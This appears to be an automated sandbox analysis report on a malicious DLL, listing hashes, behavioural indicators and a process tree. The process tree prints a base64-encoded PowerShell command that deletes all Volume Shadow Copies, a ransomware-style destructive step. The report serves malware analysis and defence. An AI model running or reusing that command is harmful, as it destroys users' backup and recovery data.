Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 01:06
Static task
static1
Behavioral task
behavioral1
Sample
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll
Resource
win10-en-20211208
General
-
Target
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll
-
Size
166KB
-
MD5
191fe230379a863d754bf84dbacc52bf
-
SHA1
169ddded3a4e59ceab433deb66b03e4af8576fa3
-
SHA256
c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02
-
SHA512
85afdc57d6f71781a7749f40867ee167ba26dc5c7e38352b0c960106227d3838fc1fc71cdbc19fa50654f2d9db94d9d66d1a31b7060b3fea70be8b73d766f157
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\F: rundll32.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0aceb8fc010d801 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
rundll32.exepowershell.exepid process 2036 rundll32.exe 2036 rundll32.exe 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1748 powershell.exe Token: SeBackupPrivilege 964 vssvc.exe Token: SeRestorePrivilege 964 vssvc.exe Token: SeAuditPrivilege 964 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 1656 wrote to memory of 2036 1656 rundll32.exe rundll32.exe PID 2036 wrote to memory of 1748 2036 rundll32.exe powershell.exe PID 2036 wrote to memory of 1748 2036 rundll32.exe powershell.exe PID 2036 wrote to memory of 1748 2036 rundll32.exe powershell.exe PID 2036 wrote to memory of 1748 2036 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c5fb7187fb4eeb1ab4d725febec0c79ec45ae67498fbc2007b00e0cae11c8a02.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:964
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1748-65-0x000007FEFC261000-0x000007FEFC263000-memory.dmpFilesize
8KB
-
memory/1748-70-0x00000000024BB000-0x00000000024DA000-memory.dmpFilesize
124KB
-
memory/1748-67-0x000007FEF34E0000-0x000007FEF403D000-memory.dmpFilesize
11.4MB
-
memory/1748-69-0x00000000024B4000-0x00000000024B7000-memory.dmpFilesize
12KB
-
memory/1748-68-0x00000000024B2000-0x00000000024B4000-memory.dmpFilesize
8KB
-
memory/1748-66-0x00000000024B0000-0x00000000024B2000-memory.dmpFilesize
8KB
-
memory/2036-59-0x00000000034B0000-0x00000000035B9000-memory.dmpFilesize
1.0MB
-
memory/2036-60-0x0000000000160000-0x000000000016A000-memory.dmpFilesize
40KB
-
memory/2036-64-0x00000000001A0000-0x00000000001A6000-memory.dmpFilesize
24KB
-
memory/2036-61-0x0000000000170000-0x0000000000171000-memory.dmpFilesize
4KB
-
memory/2036-62-0x0000000000180000-0x0000000000181000-memory.dmpFilesize
4KB
-
memory/2036-63-0x0000000000190000-0x0000000000191000-memory.dmpFilesize
4KB
-
memory/2036-54-0x0000000075CE1000-0x0000000075CE3000-memory.dmpFilesize
8KB
-
memory/2036-58-0x00000000002B0000-0x00000000002CF000-memory.dmpFilesize
124KB
-
memory/2036-57-0x00000000030F0000-0x000000000321D000-memory.dmpFilesize
1.2MB